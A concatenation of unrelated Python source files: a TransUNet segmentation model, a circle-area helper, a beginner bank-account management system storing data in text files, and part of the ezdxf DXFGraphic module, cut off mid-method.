x2 = self.encoder1(x1)
x3 = self.encoder2(x2)
x = self.encoder3(x3)
x = self.vit(x)
x = rearrange(x, "b (x y) c -> b c x y", x=self.vit_img_dim, y=self.vit_img_dim)
x = self.conv2(x)
x = self.norm2(x)
x = self.relu(x)
return x, x1, x2, x3
class Decoder(nn.Module):
def __init__(self, out_channels, class_num):
super().__init__()
self.decoder1 = DecoderBottleneck(out_channels * 8, out_channels * 2)
self.decoder2 = DecoderBottleneck(out_channels * 4, out_channels)
self.decoder3 = DecoderBottleneck(out_channels * 2, int(out_channels * 1 / 2))
self.decoder4 = DecoderBottleneck(int(out_channels * 1 / 2), int(out_channels * 1 / 8))
self.conv1 = nn.Conv2d(int(out_channels * 1 / 8), class_num, kernel_size=1)
def forward(self, x, x1, x2, x3):
x = self.decoder1(x, x3)
x = self.decoder2(x, x2)
x = self.decoder3(x, x1)
x = self.decoder4(x)
x = self.conv1(x)
return x
class TransUNet(nn.Module):
def __init__(self, img_dim, in_channels, out_channels, head_num, mlp_dim, block_num, patch_dim, class_num):
super().__init__()
self.encoder = Encoder(img_dim, in_channels, out_channels,
head_num, mlp_dim, block_num, patch_dim)
self.decoder = Decoder(out_channels, class_num)
def forward(self, x):
x, x1, x2, x3 = self.encoder(x)
x = self.decoder(x, x1, x2, x3)
return x
if __name__ == '__main__':
import torch
transunet = TransUNet(img_dim=128,
in_channels=3,
out_channels=128,
head_num=4,
mlp_dim=512,
block_num=8,
patch_dim=16,
class_num=1)
print(sum(p.numel() for p in transunet.parameters()))
print(transunet(torch.randn(1, 3, 128, 128)).shape) |
from math import pi
def circle_area(radius):
if type(radius) not in [int, float]:
raise TypeError("The radius is not number")
if radius < 0:
raise ValueError("The radius is less than zero.")
return pi*(radius**2)
""""
radii = [2, 0, -3, 2 + 5j, True]
message = "Area of circles with r = {radius} is {area}."
for r in radii:
A = circle_area(r)
print(message.format(radius=r, area=A))
""" |
import datetime
today = datetime.date.today() # global variable to permanantly store the date of day of program execution
class BankAccount(object):
"""
A class to represent a Bank Account
** This class acts as a superclass for classes; SavingsAccount and CheckAccount
Constructor Args:
-> account_number (str): A Unique Bank Account Identifier
-> funds (float): The total funds allocated to the Bank Account. Defaults to 0.0
-> transaction_history (list): A list that contains all the transactions that involves the said Bank Account. Defaults to None
"""
COUNTRY = 'IE'
CHECK_DIGIT = '69'
BANK_CODE = 'GBIK'
BRANCH_CODE = '123456'
def __init__(self, account_number: str, funds: float = 0.0, transaction_history: list = None) -> (None):
"""
constructor method for class Bank Account
Args:
-> account_number (str): A Unique Bank Account Identifier
-> funds (float): The total funds allocated to the Bank Account. Defaults to 0.0
-> transaction_history (list): A list that contains all the transactions that involves the said Bank Account. Defaults to None
"""
self.account_number = account_number
self._funds = funds
self.iban = self.COUNTRY + self.CHECK_DIGIT + self.BANK_CODE + self.BRANCH_CODE + self.account_number
if transaction_history is None:
self._transaction_history = []
else:
self._transaction_history = transaction_history
def set_funds(self, funds: float) -> (None):
"""
set method to set the protected variable funds to a new value (arg) funds
Args:
-> funds (float): update float value to set _funds to
"""
self._funds = funds
def get_funds(self) -> (float):
"""
get method to return the value of the protected variable funds
Returns:
-> float: funds is a float value
"""
return self._funds
def get_transactions(self) -> (list[str]):
"""
get method to return the protected list of transactions associated with the bank account
Returns:
-> list: list of strings of all the transactions
"""
return self._transaction_history
def _file_index(self, file_name: str) -> (int):
"""
method that finds the final index within a given file (file_name: str)
Args:
-> file_name (str): text file to find index for
Returns:
-> int: returns the index of the final item in the text file
"""
# try-except to catch file name error
try:
with open(file_name, 'r') as f:
num_lines = len([line.strip('\n') for line in f.readlines() if line != '\n'])
return num_lines
except IOError as file_unidentified:
print(file_unidentified)
def deposit(self, amount: float) -> (None):
"""
method to deposit money into a given Bank Account, updates text files; accounts and transactions
with updated values
Args:
-> amount (float): amount to be added to current funds
"""
# check for non-negative input
if amount > 0:
with open('data/accounts.txt', mode='r') as f:
new_accounts = []
'''
for loop to read and modify a specific account that matches the current instance's bank account number.
if a match is found, the specific account gets modified to the updated funds value within the accounts.txt file
'''
for account in f.readlines():
# check if instance bank account number matches with current account in the loop
if str(self.account_number) in account:
# if account number matched -> funds gets replaced with added funds
account = account.replace(str(self._funds), str(self._funds + amount), 1)
new_accounts.append(account)
# writing all accounts back to the accounts text file
with open('data/accounts.txt', mode='w') as f:
for account in new_accounts:
f.write(account)
self._funds += amount
# appending deposit transaction to text accountsTransactions.txt
with open('data/accountsTransactions.txt', mode='a+') as g:
# using the protected _file_index method to get the appropriate index of last transaction made in the text file accountsTransactions.txt
i = self._file_index('data/accountsTransactions.txt')
# define transaction string format appropriatly for writing and write transaction
transaction = f'{i + 1}, {self.account_number}, +{amount}, {today}, deposit\n'
g.write(transaction)
# append transaction to protected instance attribute transaction history
transaction = [str(i+1), self.account_number, '+' + str(amount), str(today), 'deposit']
self._transaction_history.append(transaction)
def withdraw(self, amount: float) -> (None):
"""
method to withdraw money from a given Bank Account, updates databases i.e updates accounts and
transactions text files with updated values
Args:
-> amount (float): amount to be subtracted from current instance funds attribute
"""
if amount > 0:
with open('data/accounts.txt', mode='r') as f:
new_accounts = []
'''
for loop to read and modify a specific account that matches the current instance's bank account number.
if a match is found, the specific account gets modified to the updated funds value within the accounts.txt file
'''
for account in f.readlines():
if self.account_number in account:
# if account number matched, modify account -> funds gets replaced with updated subtracted funds
account = account.replace(str(self._funds), str(self._funds - amount), 1)
new_accounts.append(account)
# writing all accounts back to the accounts text file
with open('data/accounts.txt', mode='w') as f:
for account in new_accounts:
f.write(account)
# update instance attribute funds
self._funds -= amount
# appending withdraw transaction to text accountsTransactions.txt
with open('data/accountsTransactions.txt', mode='a') as g:
# using the protected _file_index method to get the appropriate index of last transaction made in the text file accountsTransactions.txt
i = self._file_index('data/accountsTransactions.txt')
# define transaction string format appropriatly for writing and write transaction
transaction_txt = f'{i + 1}, {self.account_number}, -{amount}, {today}, withdrawal\n'
g.write(transaction_txt)
# append to protected instance attribute transaction history
transaction = [str(i + 1), self.account_number, '-' + str(amount), str(today), 'withdrawal']
self._transaction_history.append(transaction)
else:
print('\nError, Invalid Amount\n')
def transfer(self, amount: float, recipAccount) -> (None):
"""
method to transfer money from instance to another instance, updates text files; accounts and
accountTransactions with updated funds values
Args:
-> amount (float): amount to be transferred from current instance bank account
-> recipAccount (BankAccount): BankAccount instance that receives transfer from current instance
"""
# check for non-negative input
if amount > 0:
with open('data/accounts.txt', mode='r') as f:
new_accounts = []
'''
for loop to read and modify a specific account that matches the recipient object's bank account number.
if a match is found, the specific account gets modified to the updated funds value within the accounts.txt file
'''
for account in f.readlines():
# check if recipient bank account number matches with current account in the loop
if recipAccount.account_number in account:
# if account number matched -> funds gets replaced with added funds
account = account.replace(str(recipAccount.get_funds()), str(recipAccount.get_funds() + amount), 1)
# check if (self)instance account number m atches with current account in loop
elif self.account_number in account:
# if account number matched -> funds gets replaced with added funds
account = account.replace(str(self._funds), str(self._funds + amount), 1)
new_accounts.append(account)
# writing all accounts back to the accounts text file
with open('data/accounts.txt', mode='w') as f:
for account in new_accounts:
f.write(account)
# update current instance funds and use recipient instance's set funds class method to update(set) its protected funds attribute
self._funds -= amount
recipAccount.set_funds(recipAccount.get_funds() + amount)
# appending transfer transaction to text accountsTransactions.txt
with open('data/accountsTransactions.txt', mode='a+') as g:
# using the protected _file_index method to get the appropriate index of last transaction made in the text file
i = self._file_index('data/accountsTransactions.txt')
# define transaction string format appropriatly for writing and write transaction
transaction = f'{i + 1}, {self.account_number}, -{amount}, {today}, transfer to {recipAccount.account_number}\n{i + 2}, {recipAccount.account_number}, +{amount}, {today}, transfer from {self.account_number}\n'
g.writelines(transaction)
# append to both current Bank Account instance and Recipient Bank Account protected attribute transaction history
transaction_to = [str(i + 1), self.account_number, '-' + str(amount), str(today), f'transfer to {recipAccount.account_number}']
self._transaction_history.append(transaction_to)
transaction_from = [str(i + 2), self.account_number, '+' + str(amount), str(today), f'transfer from {self.account_number}']
recipAccount.get_transactions().append(transaction_from)
else:
print('\nError, Invalid Amount\n')
def __str__(self) -> (str):
"""
convert instance to string -> displays non-sensitive account information
"""
return f"Account Number: {self.account_number}\nIBAN: {self.iban}\n"
class SavingsAccount(BankAccount):
"""
Subclass of class Bank Account to represent a Savings Account at a bank. Some superclass methods
are modified -> withdraw, transfer. Added methods are -> num_withdrawl_transfers
Constructor Args:
-> account_number (str): A Unique Bank Account Identifier
-> funds (float): The total funds allocated to the Bank Account. Defaults to 0.0
-> transaction_history (list): A list that contains all the transactions that involves the said Bank Account. Defaults to None
"""
def __init__(self, account_number: float = None, funds: float = 0.0, transaction_history: list = None) -> (None):
BankAccount.__init__(self, account_number, funds, transaction_history)
"""
Constructor for class Savings Account
Args:
-> account_number (str): A Unique Bank Account Identifier
-> funds (float): The total funds allocated to the Bank Account. Defaults to 0.0
-> transaction_history (list): A list that contains all the transactions that involves the said Bank Account. Defaults to None
"""
def __num_withdrawal_transfers(self) -> (bool):
"""
method to find total amount of transactions performed using this instance. Used to satisfy system
requirement to limit number of transactions a month to 1.
** Does not include deposit transactions
Returns:
-> bool: True or False -> transactions performed exceeds allowed limit
"""
transfer_limt = False
# for loop used to check dates on transactions
for transaction in self._transaction_history:
# cast transaction date into datetime object
date_obj = datetime.datetime.strptime(transaction[3], '%Y-%m-%d')
# check if current month matches transaction date and if transaction methods are withdrawl or transfer
if today.month == date_obj.month and (transaction[4] == 'withdrawal' or transaction[4] == 'transfer'):
transfer_limt = True
break
return transfer_limt
def withdraw(self, amount: float) -> (BankAccount.withdraw):
"""
identical method to superclass method withdraw, just added max withdrawl/transfer limit requirement and non-negative validation
Args:
-> amount (float): amount to be withdrawn from current instance account
"""
# if statement to check if there's sufficient funds for a withdrawl and also check num monthly withdrawls
if(self._funds - amount) > 0 and not self.__num_withdrawal_transfers():
return BankAccount.withdraw(self, amount)
else:
print('\n\nMonthly withdrawal limit reached')
def transfer(self, amount: float, recipAccount : BankAccount) -> (None):
"""
identical method to superclass method withdraw, just added max withdrawl/transfer limit requirement and non-negative validation
Args:
-> amount (float): amount to be transfered from current instance account
-> recipAccount (BankAccount): recipient instance to receive funds
"""
# if statement to check if there's sufficient funds for a withdrawl and also check num monthly withdrawls
if(self._funds - amount) > 0 and not self.__num_withdrawal_transfers():
BankAccount.transfer(self, amount, recipAccount)
else:
print('\n\nMonthly transfer limit reached')
class CheckAccount(BankAccount):
"""
Subclass of class Bank Account to represent a Savings Account at a bank. Some superclass methods
are modified -> withdraw, transfer. Added methods are -> num_withdrawl_transfers
Constructor Args:
-> account_number (str): A Unique Bank Account Identifier
-> funds (float): The total funds allocated to the Bank Account. Defaults to 0.0
-> transaction_history (list): A list that contains all the transactions that involves the said Bank Account. Defaults to None
-> credit_limit (float): The maximum credit allowed by the account. Defaults to a credit of 50
"""
def __init__(self, account_number:str = None, funds: float = 0.0, transaction_history: list = None, credit_limit: float = 50.0) -> (None):
BankAccount.__init__(self, account_number, funds, transaction_history)
"""
Constructor for class Check Account
Args:
-> account_number (str): A Unique Bank Account Identifier
-> funds (float): The total funds allocated to the Bank Account. Defaults to 0.0
-> transaction_history (list): A list that contains all the transactions that involves the said Bank Account. Defaults to None
-> credit_limit (float): The maximum credit allowed by the account. Defaults to a credit of 50
"""
# if statement to convert credit limit to negative value
if credit_limit > 0:
credit_limit = credit_limit * -1
self.__credit_limit = credit_limit
else:
self.__credit_limit = credit_limit
def withdraw(self, amount: float) -> (BankAccount.withdraw):
"""
identical method to superclass method withdraw, just added max withdrawl/transfer limit requirement and non-negative validation
Args:
-> amount (float): amount to be withdrawn from current instance account
"""
# if statement to check if withdrawl falls within the credit limit
if(self._funds - amount) > self.__credit_limit:
return BankAccount.withdraw(self, amount)
else:
print('\nTransaction exceeds Credit Limit\n')
def get_credit_limit(self) -> (float):
"""
get method to return private instance credit limit
Returns:
-> float: max credit allowed for instance
"""
return self.__credit_limit
def transfer(self, amount: float, recipAccount : BankAccount) -> (None):
"""
identical method to superclass(BankAccount) method withdraw, added credit check
Args:
-> amount (float): amount to be transfered from current instance account
-> recipAccount (BankAccount): recipient instance to receive funds
"""
# if statement to check if transfer falls within instance credit limit
if(self._funds - amount) > self.__credit_limit:
BankAccount.transfer(self, amount, recipAccount)
else:
print('\nTransaction Exceeds Credit Limit\n')
class Customer(object):
"""
A class to represent a customer in a Bank Management System.
Constructor Args:
-> customer_id (int): A unique Customer identifier
-> name (str): Name of customer
-> surname (str): Surname of customer
-> dob (datetime.datetime): stores customer date of birth as datetime.datime object
-> address (str): living address of customer
-> accounts (list): list of customer bank account objects
"""
def __init__(self, customer_id: int = 0, name: str = None, surname: str = None, dob: datetime.datetime = None, address:str = None, accounts: list[BankAccount] = None) -> (None):
"""
Customer constructor method
Constructor Args:
-> customer_id (int): A unique Customer identifier
-> name (str): Name of customer
-> surname (str): Surname of customer
-> dob (datetime.datetime): stores customer date of birth as datetime.datime object
-> address (str): living address of customer
-> accounts (list): list of customer bank account objects
"""
self.__customer_id = customer_id
self.name = name
self.surname = surname
self.__dob = dob
self.__address = address
if accounts is None:
self.__accounts = []
else:
self.__accounts = accounts
# initializes age of instance based upon current date and given date of birth
age = today.year - self.__dob.year
# check if birth day has already occured within year of execution (if birthday is yet to occur, hence age - 1)
if today < datetime.date(today.year, self.__dob.month, self.__dob.day):
age -= 1
self.age = age
def get_custID(self) -> (int):
"""
get method to return instance customer ID
Returns:
(int): unique customer identifier defined as integer
"""
return self.__customer_id
def get_accounts(self) -> (list[BankAccount]):
"""
get method to return list of instance's list of bank account instances
Returns:
(list[BankAccount]): list of bank accounts associated with instance
"""
return self.__accounts
def add_account(self, account: BankAccount) -> (None):
"""
adds a new account object to instance's list of accounts
Args:
account (BankAccount): BankAccount instance to be added to protected class attribute accounts
"""
# if statement to check if account is an instance of subclass SavingsAccount and customer has an age of 14 or older
if isinstance(account, SavingsAccount) and self.age >= 14:
# read all customer data from customers.txt
with open('data/customers.txt', 'r') as g:
new_customers = []
# for loop to get specific customer in customers.txt file that matches current instance customer id
for customer in g.readlines():
# if statement to check if customer at specific line in text, matches instance customer id
if ((customer.strip('\n')).split(', '))[0] == str(self.__customer_id): # TEST
# modify string format of current instance
customer = customer.strip('\n') + f', {account.account_number}\n'
new_customers.append(customer)
# write updated instance and customers back into customers.txt
with open('data/customers.txt', 'w') as g:
for customer in new_customers:
g.write(customer)
# append new account to protected class list attribute, accounts
self.__accounts.append(account)
# append new account to accounts.txt in appropriate string format
with open('data/accounts.txt', 'a+') as f:
account_info = f'{account.account_number}, SavingsAccount, {account.get_funds()}\n'
f.write(account_info)
# if statement to check if account is an instance of subclass CheckAccount and customer has an age of 18 or older
elif isinstance(account, CheckAccount):
# read all customer data from customers.txt
with open('data/customers.txt', 'r') as f:
new_customers = []
# for loop to get specific customer in customers.txt file that matches current instance customer id
for customer in f.readlines():
#customer_data = (customer.strip('\n')).split(', ')
# if statement to check if formatted customer at specific line in text matches instance customer id
if ((customer.strip('\n')).split(', '))[0] == str(self.__customer_id):
# modify string format of current instance
customer = customer.strip('\n') + f', {account.account_number}\n'
new_customers.append(customer)
# write updated instance and customers back into customers.txt
with open('data/customers.txt', 'w') as f:
for customer in new_customers:
f.write(customer)
# append new account to protected class list attribute, accounts
self.__accounts.append(account)
# append new account to accounts.txt in appropriate string format
with open('data/accounts.txt', 'a+') as g:
account_info = f'{account.account_number}, CheckAccount, {account.get_funds()}, {account.get_credit_limit()}\n'
g.write(account_info)
else:
print(f"{account} is not an instance of BankAccount")
def delete_cust_account(self, account : BankAccount) -> (None):
"""
deletes account object from instance's list of accounts
Args:
account (BankAccount): account object associated with instance to be remove from protected class attribute accounts
"""
# read all account data from accounts.txt
with open('data/accounts.txt', mode='r') as f:
new_accounts = []
# for loop to find account to be deleted in accounts.txt
for acc in f.readlines():
# if statement to skip over (prevent) account from being appended to new_accounts array
if account.account_number in acc:
continue
new_accounts.append(acc)
# read all customer data from customers.txt
with open('data/customers.txt', mode='r') as g:
new_customers = []
# for loop to find current instance's data in customers.txt
for cust in g.readlines():
# if statement to modify instance's data
if account.account_number in cust:
pre_cust = ((cust.strip('\n')).split(', '))
pre_cust.remove(account.account_number)
cust = (', '.join(pre_cust)) + '\n'
new_customers.append(cust)
# removes account from protected list class attributes
self.__accounts.remove(account)
# write back all account and customer updated data
with open('data/accounts.txt', mode='w') as f:
for acc in new_accounts:
f.write(acc)
with open('data/customers.txt', mode='w') as g:
for cust in new_customers:
g.write(cust)
def __str__(self) -> (str):
"""
convert instance to string -> displays non-sensitive customer information
"""
return f'Name: {self.name}\nSurname: {self.surname}\nAge: {self.age}\nAddress: {self.__address}\n' |
# Copyright (c) 2019-2021 Manfred Moitzi
# License: MIT License
from typing import TYPE_CHECKING, Optional, Tuple, Iterable, Dict, Any
from ezdxf.entities import factory
from ezdxf import options
from ezdxf.lldxf import validator
from ezdxf.lldxf.attributes import (
DXFAttr,
DXFAttributes,
DefSubclass,
RETURN_DEFAULT,
group_code_mapping,
)
from ezdxf import colors as clr
from ezdxf.lldxf.const import (
DXF12,
DXF2000,
DXF2004,
DXF2007,
DXF2013,
DXFValueError,
DXFKeyError,
DXFTableEntryError,
SUBCLASS_MARKER,
DXFInvalidLineType,
DXFStructureError,
)
from ezdxf.math import OCS, Matrix44
from ezdxf.proxygraphic import load_proxy_graphic, export_proxy_graphic
from .dxfentity import DXFEntity, base_class, SubclassProcessor, DXFTagStorage
if TYPE_CHECKING:
from ezdxf.eztypes import (
Auditor,
TagWriter,
BaseLayout,
DXFNamespace,
Vertex,
Drawing,
)
__all__ = [
"DXFGraphic",
"acdb_entity",
"SeqEnd",
"add_entity",
"replace_entity",
"elevation_to_z_axis",
"is_graphic_entity",
]
GRAPHIC_PROPERTIES = {
"layer",
"linetype",
"color",
"lineweight",
"ltscale",
"true_color",
"color_name",
"transparency",
}
acdb_entity: DefSubclass = DefSubclass(
"AcDbEntity",
{
# Layer name as string, no auto fix for invalid names!
"layer": DXFAttr(
8, default="0", validator=validator.is_valid_layer_name
),
# Linetype name as string, no auto fix for invalid names!
"linetype": DXFAttr(
6,
default="BYLAYER",
optional=True,
validator=validator.is_valid_table_name,
),
# ACI color index, BYBLOCK=0, BYLAYER=256, BYOBJECT=257:
"color": DXFAttr(
62,
default=256,
optional=True,
validator=validator.is_valid_aci_color,
fixer=RETURN_DEFAULT,
),
# modelspace=0, paperspace=1
"paperspace": DXFAttr(
67,
default=0,
optional=True,
validator=validator.is_integer_bool,
fixer=RETURN_DEFAULT,
),
# Lineweight in mm times 100 (e.g. 0.13mm = 13). Smallest line weight is 13
# and biggest line weight is 200, values outside this range prevents AutoCAD
# from loading the file.
# Special values: BYLAYER=-1, BYBLOCK=-2, DEFAULT=-3
"lineweight": DXFAttr(
370,
default=-1,
dxfversion=DXF2000,
optional=True,
validator=validator.is_valid_lineweight,
fixer=validator.fix_lineweight,
),
"ltscale": DXFAttr(
48,
default=1.0,
dxfversion=DXF2000,
optional=True,
validator=validator.is_positive,
fixer=RETURN_DEFAULT,
),
# visible=0, invisible=1
"invisible": DXFAttr(60, default=0, dxfversion=DXF2000, optional=True),
# True color as 0x00RRGGBB 24-bit value
# True color always overrides ACI "color"!
"true_color": DXFAttr(420, dxfversion=DXF2004, optional=True),
# Color name as string. Color books are stored in .stb config files?
"color_name": DXFAttr(430, dxfversion=DXF2004, optional=True),
# Transparency value 0x020000TT 0 = fully transparent / 255 = opaque
"transparency": DXFAttr(440, dxfversion=DXF2004, optional=True),
# Shadow mode:
# 0 = Casts and receives shadows
# 1 = Casts shadows
# 2 = Receives shadows
# 3 = Ignores shadows
"shadow_mode": DXFAttr(284, dxfversion=DXF2007, optional=True),
"material_handle": DXFAttr(347, dxfversion=DXF2007, optional=True),
"visualstyle_handle": DXFAttr(348, dxfversion=DXF2007, optional=True),
# PlotStyleName type enum (AcDb::PlotStyleNameType). Stored and moved around
# as a 16-bit integer. Custom non-entity
"plotstyle_enum": DXFAttr(
380, dxfversion=DXF2007, default=1, optional=True
),
# Handle value of the PlotStyleName object, basically a hard pointer, but
# has a different range to make backward compatibility easier to deal with.
"plotstyle_handle": DXFAttr(390, dxfversion=DXF2007, optional=True),
# 92 or 160?: Number of bytes in the proxy entity graphics represented in
# the subsequent 310 groups, which are binary chunk records (optional)
# 310: Proxy entity graphics data (multiple lines; 256 characters max. per
# line) (optional), compiled by TagCompiler() to a DXFBinaryTag() objects
},
)
acdb_entity_group_codes = group_code_mapping(acdb_entity)
def elevation_to_z_axis(dxf: "DXFNamespace", names: Iterable[str]):
# The elevation group code (38) is only used for DXF R11 and prior and
# ignored for DXF R2000 and later.
# DXF R12 and later store the entity elevation in the z-axis of the
# vertices, but AutoCAD supports elevation for R12 if no z-axis is present.
# DXF types with legacy elevation support:
# SOLID, TRACE, TEXT, CIRCLE, ARC, TEXT, ATTRIB, ATTDEF, INSERT, SHAPE
# The elevation is only used for DXF R12 if no z-axis is stored in the DXF
# file. This is a problem because ezdxf loads the vertices always as 3D
# vertex including a z-axis even if no z-axis is present in DXF file.
if dxf.hasattr("elevation"):
elevation = dxf.elevation
# ezdxf does not export the elevation attribute for any DXF version
dxf.discard("elevation")
if elevation == 0:
return
for name in names:
v = dxf.get(name)
# Only use elevation value if z-axis is 0, this will not work for
# situations where an elevation and a z-axis=0 is present, but let's
# assume if the elevation group code is used the z-axis is not
# present if z-axis is 0.
if v is not None and v.z == 0:
dxf.set(name, v.replace(z=elevation))
class DXFGraphic(DXFEntity):
"""Common base class for all graphic entities, a subclass of
:class:`~ezdxf.entities.dxfentity.DXFEntity`. These entities resides in
entity spaces like modelspace, paperspace or block.
"""
DXFTYPE = "DXFGFX"
DEFAULT_ATTRIBS: Dict[str, Any] = {"layer": "0"}
DXFATTRIBS = DXFAttributes(base_class, acdb_entity)
def load_dxf_attribs(
self, processor: SubclassProcessor = None
) -> "DXFNamespace":
"""Adds subclass processing for 'AcDbEntity', requires previous base
class processing by parent class.
(internal API)
"""
dxf = super().load_dxf_attribs(processor)
if processor is None:
return dxf
r12 = processor.r12
# It is valid to mix up the base class with AcDbEntity class.
processor.append_base_class_to_acdb_entity()
# Load proxy graphic data if requested
if options.load_proxy_graphics:
# length tag has group code 92 until DXF R2010
if processor.dxfversion and processor.dxfversion < DXF2013:
code = 92
else:
code = 160
self.proxy_graphic = load_proxy_graphic(
processor.subclasses[0 if r12 else 1],
length_code=code,
)
processor.fast_load_dxfattribs(dxf, acdb_entity_group_codes, 1)
return dxf
def post_new_hook(self):
"""Post processing and integrity validation after entity creation
(internal API)
"""
if self.doc:
if self.dxf.linetype not in self.doc.linetypes:
raise DXFInvalidLineType(
f'Linetype "{self.dxf.linetype}" not defined.'
)
@property
def rgb(self) -> Optional[clr.RGB]:
"""Returns RGB true color as (r, g, b) tuple or None if true_color is
not set.
"""
if self.dxf.hasattr("true_color"):
return clr.int2rgb(self.dxf.get("true_color"))
else:
return None
@rgb.setter
def rgb(self, rgb: clr.RGB) -> None:
"""Set RGB true color as (r, g , b) tuple e.g. (12, 34, 56)."""
self.dxf.set("true_color", clr.rgb2int(rgb))
@property
def transparency(self) -> float:
"""Get transparency as float value between 0 and 1, 0 is opaque and 1
is 100% transparent (invisible).
"""
if self.dxf.hasattr("transparency"):
return clr.transparency2float(self.dxf.get("transparency"))
else:
return 0.0
@transparency.setter
def transparency(self, transparency: float) -> None:
"""Set transparency as float value between 0 and 1, 0 is opaque and 1
is 100% transparent (invisible).
"""
self.dxf.set("transparency", clr.float2transparency(transparency))
def graphic_properties(self) -> Dict:
"""Returns the important common properties layer, color, linetype,
lineweight, ltscale, true_color and color_name as `dxfattribs` dict.
"""
attribs = dict()
for key in GRAPHIC_PROPERTIES:
if self.dxf.hasattr(key):
attribs[key] = self.dxf.get(key)
return attribs
def ocs(self) -> OCS:
"""Returns object coordinate system (:ref:`ocs`) for 2D entities like
:class:`Text` or :class:`Circle`, returns a pass-through OCS for
entities without OCS support.
"""
# extrusion is only defined for 2D entities like Text, Circle, ...
if self.dxf.is_supported("extrusion"):
extrusion = self.dxf.get("extrusion", default=(0, 0, 1))
return OCS(extrusion)
else:
return OCS()
def set_owner(self, owner: Optional[str], paperspace: int = 0) -> None:
"""Set owner attribute and paperspace flag. (internal API)"""
self.dxf.owner = owner
if paperspace:
self.dxf.paperspace = paperspace
else:
self.dxf.discard("paperspace")
def link_entity(self, entity: "DXFEntity") -> None:
"""Store linked or attached entities. Same API for both types of
appended data, because entities with linked entities (POLYLINE, INSERT)
have no attached entities and vice versa.
(internal API)
"""
pass
def export_entity(self, tagwriter: "TagWriter") -> None:
"""Export entity specific data as DXF tags. (internal API)"""
# Base class export is done by parent class.
self.export_acdb_entity(tagwriter)
# XDATA and embedded objects export is also done by the parent class.
def export_acdb_entity(self, tagwriter: "TagWriter"):
"""Export subclass 'AcDbEntity' as DXF tags. (internal API)"""
# Full control over tag order and YES, sometimes order matters
not_r12 = tagwriter.dxfversion > DXF12
if not_r12:
tagwriter.write_tag2(SUBCLASS_MARKER, acdb_entity.name)
self.dxf.export_dxf_attribs(
tagwriter,
[
"paperspace",
"layer",
"linetype",
"material_handle",
"color",
"lineweight",
"ltscale",
"true_color",
"color_name",
"transparency",
"plotstyle_enum",
"plotstyle_handle",
"shadow_mode",
"visualstyle_handle",
],
)
if self.proxy_graphic and not_r12 and options.store_proxy_graphics:
# length tag has group code 92 until DXF R2010
export_proxy_graphic(
self.proxy_graphic,
tagwriter=tagwriter,
length_code=(92 if tagwriter.dxfversion < DXF2013 else 160),
)
def get_layout(self) -> Optional["BaseLayout"]:
"""Returns the owner layout or returns ``None`` if entity is not
assigned to any layout.
"""
if self.dxf.owner is None or self.doc is None: # unlinked entity
return None
try:
return self.doc.layouts.get_layout_by_key(self.dxf.owner)
except DXFKeyError:
pass
try:
return self.doc.blocks.get_block_layout_by_handle(self.dxf.owner)
except DXFTableEntryError:
return None
def unlink_from_layout(self) -> None:
"""
Unlink entity from associated layout. Does nothing if entity is already
unlinked.
It is more efficient to call the
:meth:`~ezdxf.layouts.BaseLayout.unlink_entity` method of the associated
layout, especially if you have to unlink more than one entity.
"""
if not self.is_alive:
raise TypeError("Can not unlink destroyed entity.")
if self.doc is None:
# no doc -> no layout
self.dxf.owner = None
return
layout = self.get_layout()
if layout:
layout.unlink_entity(self)
def move_to_layout(
self, layout: "BaseLayout", source: "BaseLayout" = None
) -> None:
"""
Move entity from model space or a paper space layout to another layout.
For block layout as source, the block layout has to be specified. Moving
between different DXF drawings is not supported.
Args:
layout: any layout (model space, paper space, block)
source: provide source layout, faster for DXF R12, if entity is
in a block layout
Raises:
DXFStructureError: for moving between different DXF drawings
"""
if source is None:
source = self.get_layout()
if source is None:
raise DXFValueError("Source layout for entity not found.")
source.move_to_layout(self, layout)
def copy_to_layout(self, layout: "BaseLayout") -> "DXFEntity":
"""
Copy entity to another `layout`, returns new created entity as
:class:`DXFEntity` object. Copying between different DXF drawings is
not supported.
Args:
layout: any layout (model space, paper space, block)
Raises:
DXFStructureError: for copying between different DXF drawings
"""
if self.doc != layout.doc:
raise DXFStructureError(
"Copying between different DXF drawings is not supported."
)
new_entity = self.copy()
layout.add_entity(new_entity)
return new_entity
def audit(self, auditor: "Auditor") -> None:
"""Audit and repair graphical DXF entities.
.. important::
Do not delete entities while auditing process, because this
would alter the entity database while iterating, instead use::
auditor.trash(entity)
to delete invalid entities after auditing automatically.
"""
assert self.doc is auditor.doc, "Auditor for different DXF document."
if not self.is_alive:
return
super().audit(auditor)
auditor.check_owner_exist(self)
dxf = self.dxf
if dxf.hasattr("layer"):
auditor.check_for_valid_layer_name(self)
if dxf.hasattr("linetype"):
auditor.check_entity_linetype(self)
if dxf.hasattr("color"):
auditor.check_entity_color_index(self)
if dxf.hasattr("lineweight"):
auditor.check_entity_lineweight(self)
if dxf.hasattr("extrusion"):
auditor.check_extrusion_vector(self)
def transform(self, m: "Matrix44") -> "DXFGraphic":
"""Inplace transformation interface, returns `self`
(floating interface).
Args:
m: 4x4 transformation matrix (:class:`ezdxf.math.Matrix44`)
"""
raise NotImplementedError()
def post_transform(self, m: "Matrix44") -> None:
"""Should be called if the main entity transformation was successful.
"""
if self.xdata is not None:
self.xdata.transform(m)
@property
def is_post_transform_required(self) -> bool:
"""Check if post transform call is required. """
return self.xdata is not None
def translate(self, dx: float, dy: float, dz: float) -> "DXFGraphic":
"""Translate entity inplace about `dx` in x-axis, `dy` in y-axis and
`dz` in z-axis, returns `self` (floating interface).
Basic implementation uses the :meth:`transform` interface, subclasses
may have faster implementations.
"""
return self.transform(Matrix44.translate(dx, dy, dz))
def scale(self, sx: float, sy: float, sz: float) -> "DXFGraphic":
"""Scale entity inplace about `dx` in x-axis, `dy` in y-axis and `dz`
in z-axis, returns `self` (floating interface).
"""
return self.transform(Matrix44.scale(sx, sy, sz))
def scale_uniform(self, s: float) -> "DXFGraphic":
"""Scale entity inplace uniform about `s` in x-axis, y-axis and z-axis,
returns `self` (floating interface).
"""
return self.transform(Matrix44.scale(s))
def rotate_axis(self, axis: "Vertex", angle: float) -> "DXFGraphic":
"""Rotate entity inplace about vector `axis`, returns `self`
(floating interface).
Args:
axis: rotation axis as tuple or :class:`Vec3`
angle: rotation angle in radians
"""
return self.transform(Matrix44.axis_rotate(axis, angle))
def rotate_x(self, angle: float) -> "DXFGraphic":
"""Rotate entity inplace about x-axis, returns `self`
(floating interface).
Args:
angle: rotation angle in radians
"""
return self.transform(Matrix44.x_rotate(angle))
def rotate_y(self, angle: float) -> "DXFGraphic":
"""Rotate entity inplace about y-axis, returns `self`
(floating interface).
Args:
angle: rotation angle in radians
"""
return self.transform(Matrix44.y_rotate(angle))
def rotate_z(self, angle: float) -> "DXFGraphic":
